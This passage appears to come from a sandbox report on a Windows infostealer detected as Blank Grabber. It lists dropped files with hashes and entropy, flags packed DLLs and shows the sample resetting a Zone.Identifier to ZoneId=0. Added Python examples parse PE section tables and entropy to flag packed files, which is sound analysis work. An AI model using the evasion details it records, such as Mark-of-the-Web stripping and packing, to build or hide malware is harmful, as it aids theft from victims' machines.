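        raw = data[table + 40 * i: table + 40 * i + 8]                # Name[8], NUL padded
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes) -> dict:
    """Produce the same fields as one dropped-file record, plus UPX indicators."""
    ent = shannon_entropy(data)
    rec = {
        "size": len(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= ENCRYPTED_ENTROPY_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sections": [],
        "upx_magic": b"UPX!" in data,   # UPX writes "UPX!" in its own header after the section table
    }
    try:
        rec["sections"] = pe_section_names(data)
    except ValueError:
        pass                            # not a PE: zip/pyc drops land here
    rec["upx_sections"] = [s for s in rec["sections"] if s.startswith("UPX")]
    rec["packed_with_upx"] = bool(rec["upx_sections"]) and rec["upx_magic"]
    return rec


def build_fake_upx_dll() -> bytes:
    """Constructed stand-in for the packed x64 DLLs above (not a real sample).

    Minimal PE32+ skeleton: DOS header, COFF header, zeroed optional header,
    three section headers named UPX0/UPX1/.rsrc, the UPX version/magic string,
    then seeded pseudo-random bytes standing in for the packed body.
    """
    sections = [b"UPX0", b"UPX1", b".rsrc"]
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x2022)
    optional = struct.pack("<H", 0x20B) + b"\0" * 238                       # PE32+ magic, 240 bytes total
    table = b"".join(name.ljust(8, b"\0") + b"\0" * 32 for name in sections)
    body = b"4.02UPX!" + random.Random(1578555).randbytes(256 * 1024)
    return dos + coff + optional + table + body


def build_fake_stored_zip() -> bytes:
    """Constructed stand-in for the 'compression method=store' pyc archives above."""
    payload = b"_collections_abc.pyc" + b"def __init__(self): pass\n" * 2000
    return b"PK\x03\x04" + payload


if __name__ == "__main__":
    for label, blob in (("fake UPX DLL", build_fake_upx_dll()), ("fake stored zip", build_fake_stored_zip())):
        print(label, triage(blob))
```

The useful check is the pairing of the two signals: a high-entropy body alone also describes the stored zips of compiled Python above, so a triage rule should require the UPX section names or magic before calling a file packed, and treat entropy near 8.0 with no recognizable packer as a stronger hint of encryption than of compression.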
Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                        SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                        SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):456
                                                                                                                                                                                                                                        Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                        MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                        SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                        SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                        SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26392
                                                                                                                                                                                                                                        Entropy (8bit):7.406438297877472
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
                                                                                                                                                                                                                                        MD5:B6DE7C98E66BDE6ECFFBF0A1397A6B90
                                                                                                                                                                                                                                        SHA1:63823EF106E8FD9EA69AF01D8FE474230596C882
                                                                                                                                                                                                                                        SHA-256:84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
                                                                                                                                                                                                                                        SHA-512:1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):637208
                                                                                                                                                                                                                                        Entropy (8bit):7.9938769843425055
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
                                                                                                                                                                                                                                        MD5:0C4996047B6EFDA770B03F8F231E39B8
                                                                                                                                                                                                                                        SHA1:DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
                                                                                                                                                                                                                                        SHA-256:983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
                                                                                                                                                                                                                                        SHA-512:112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):296728
                                                                                                                                                                                                                                        Entropy (8bit):7.985011478309557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                                                                                                                                                                                                        MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                                                                                                                                                                                                        SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                                                                                                                                                                                                        SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                                                                                                                                                                                                        SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3037184
Entropy (8bit):6.54792183955597
Encrypted:false
SSDEEP:49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O
MD5:CD7686B11754D77B8722880A1A3A9A43
SHA1:EA1C00D2985812539452A31D8F75506573DAD692
SHA-256:A3D6D7EEA1A9270E20BE65394C942207078DAAC5952A12A9404DD4C557FD2944
SHA-512:64D095A52C5A9987CBDBE00C95CD96DB67D5BF9FAA9A53C1132EAB27BE7D0D8B7ADF209195DB8B925C6453ADA759165ECFC8C1A5AC4F3EA7D3427FEA2B643CAB
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................02.....d.....@.................................W...k...........................,.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyplpdnx.@+......>+.................@...lxepjdzt......1......2..............@....taggant.0....2.."...6..............@...........................................................................................................................................................................................................................................................
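The dropped copy of file.exe above carries section names that are neither linker defaults nor readable (" . ", ".idata " with a trailing blank, "uyplpdnx", "lxepjdzt") plus a ".taggant" section, which is what the "PE file contains section with special chars" signature keys on. The following added example (not part of the Joe Sandbox report) parses a PE section table and classifies each name; the sample PE is constructed with those names from the preview, the first of which is only approximately legible in the dotted rendering, and the standard/packer name lists are the author's own, not exhaustive.

```python
"""Parse a PE section table and flag suspicious section names.

Added example, not part of the Joe Sandbox report. The section names are
the ones visible in the dropped file.exe preview (" . " is approximate);
the rest of the sample PE is constructed.
"""
import re
import struct

# Names a typical MSVC/MinGW-linked image carries (assumed list, not exhaustive).
STANDARD_SECTIONS = {
    ".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
    ".pdata", ".bss", ".tls", ".CRT", ".didat", ".xdata", ".gfids",
}
# Names commonly left behind by packers/protectors (assumed list, not exhaustive).
PACKER_SECTIONS = {".taggant", "UPX0", "UPX1", ".themida", ".vmp0", ".vmp1", ".enigma1"}
NAME_OK = re.compile(r"^[A-Za-z0-9._$@]+$")


def build_sample_pe(names):
    """Constructed minimal PE: DOS header, PE signature, COFF header, empty
    optional header and a section table. Enough for section-name analysis."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    # Machine=i386, NumberOfSections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0xE0, 0x0102)
    opt = b"\0" * 0xE0
    sections = b""
    for i, n in enumerate(names):
        raw = n.encode("latin-1")[:8].ljust(8, b"\0")
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs, linenums,
        # NumberOfRelocations, NumberOfLinenumbers, Characteristics (code|exec|read)
        sections += raw + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1), 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + sections


def parse_sections(data):
    """Return the section names (NUL-trimmed) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    _machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff_off)
    sec_off = coff_off + 20 + opt_size
    names = []
    for i in range(nsec):
        raw = data[sec_off + 40 * i: sec_off + 40 * i + 8]
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names


def classify(name):
    """packer > standard > special-chars > nonstandard."""
    if name in PACKER_SECTIONS:
        return "packer"
    if name in STANDARD_SECTIONS:
        return "standard"
    if not NAME_OK.match(name):
        return "special-chars"
    return "nonstandard"


def suspicious_sections(data):
    """Every section whose name is not a plain linker default."""
    return [(n, classify(n)) for n in parse_sections(data) if classify(n) != "standard"]


# Section names as they appear in the dropped file.exe preview (first one approximate).
SAMPLE_NAMES = [" . ", ".rsrc", ".idata ", "uyplpdnx", "lxepjdzt", ".taggant"]
SAMPLE_PE = build_sample_pe(SAMPLE_NAMES)

if __name__ == "__main__":
    for name, verdict in suspicious_sections(SAMPLE_PE):
        print(f"{name!r:12} {verdict}")
```

On a real sample, feed the bytes of the dropped file instead of SAMPLE_PE; a trailing blank in ".idata " or a leading blank in " . " is invisible in most hex dumps but is exactly what the special-chars signature fires on.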
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:unknown
Preview:[ZoneTransfer]....ZoneId=0
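The Entropy (8bit) column is Shannon entropy in bits per byte over the file's byte histogram, and the Encrypted flag is a threshold on it, which is why a 26-byte text stream scores 3.95 and the packed 3 MB PE above scores 6.55 without being flagged. The added example below (not part of the report) reproduces the 3.95006375643621 reported for the Zone.Identifier stream from a reconstruction of its content; the standard Mark-of-the-Web layout with a trailing CRLF is assumed, and the MD5 comparison tells you whether that byte-exact guess is right. ZoneId=0 is the Local Machine zone, so a file.exe that writes this value into another file's stream is removing the Internet-origin marking rather than setting it.

```python
"""Reproduce the report's Entropy (8bit) column and its Encrypted heuristic.

Added example, not part of the Joe Sandbox report. ZONE_ID_CONTENT is a
reconstruction of the 26-byte Zone.Identifier stream from the preview and
size; the placement of the two CRLFs is an assumption. RANDOM_BLOB is a
constructed stand-in for encrypted/packed bytes.
"""
import hashlib
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: -sum(p * log2 p) over the 256 byte values; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    """Heuristic behind an 'Encrypted' column: a near-uniform byte histogram.
    The 7.5 cut-off is this example's choice, not the sandbox's documented one."""
    return shannon_entropy(data) >= threshold


# Reconstructed Zone.Identifier stream written by file.exe (26 bytes, per the report).
ZONE_ID_CONTENT = b"[ZoneTransfer]\r\nZoneId=0\r\n"
REPORTED_ZONE_ID_ENTROPY = 3.95006375643621
REPORTED_ZONE_ID_MD5 = "187f488e27db4af347237fe461a079ad"


def matches_reported_md5(data: bytes) -> bool:
    """True only if the byte-exact reconstruction is right; False means the
    non-printable bytes are laid out differently than assumed (entropy alone
    cannot tell, since it ignores byte order)."""
    return hashlib.md5(data).hexdigest() == REPORTED_ZONE_ID_MD5


def zone_id(data: bytes):
    """Parse the ZoneId value out of a Zone.Identifier stream; 0 = Local Machine,
    3 = Internet (the value a browser download normally carries)."""
    for line in data.decode("ascii", "replace").splitlines():
        if line.startswith("ZoneId="):
            return int(line.split("=", 1)[1])
    return None


# Constructed high-entropy blob, deterministic so the example is reproducible.
_rng = random.Random(1578555)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    print(f"Zone.Identifier entropy {shannon_entropy(ZONE_ID_CONTENT):.14f} "
          f"(report: {REPORTED_ZONE_ID_ENTROPY}), ZoneId={zone_id(ZONE_ID_CONTENT)}, "
          f"MD5 matches report: {matches_reported_md5(ZONE_ID_CONTENT)}")
    print(f"random blob entropy {shannon_entropy(RANDOM_BLOB):.3f}, "
          f"encrypted? {looks_encrypted(RANDOM_BLOB)}")
```

The entropy matches the report to every printed digit, which pins down the byte histogram (two CR, two LF and the printable text) but not their order; only the hash settles that.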
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0822564844713884
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryalpak7YnqqplePN5Dlq5J:+RI+ycuZhNQrakSpEPNnqX
MD5:C63D970ED48E8A225320F3DC36154FC4
SHA1:81D0B4B2E788EFD03817116D9460CFB6D4C853F9
SHA-256:4EC26AEE81A238E92C0EE64E5BB072CA6B9AAA687A09AE3086A391B12B2DF891
SHA-512:358963F7A6EC7CFA864154778F0DA9A15C07BB25EEA8ACE17512B80A3943ABF13C27611EAA49C5117860EA113D13EE7ACE6CAE8196DD6E41D370D2156A190070
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Reputation:unknown
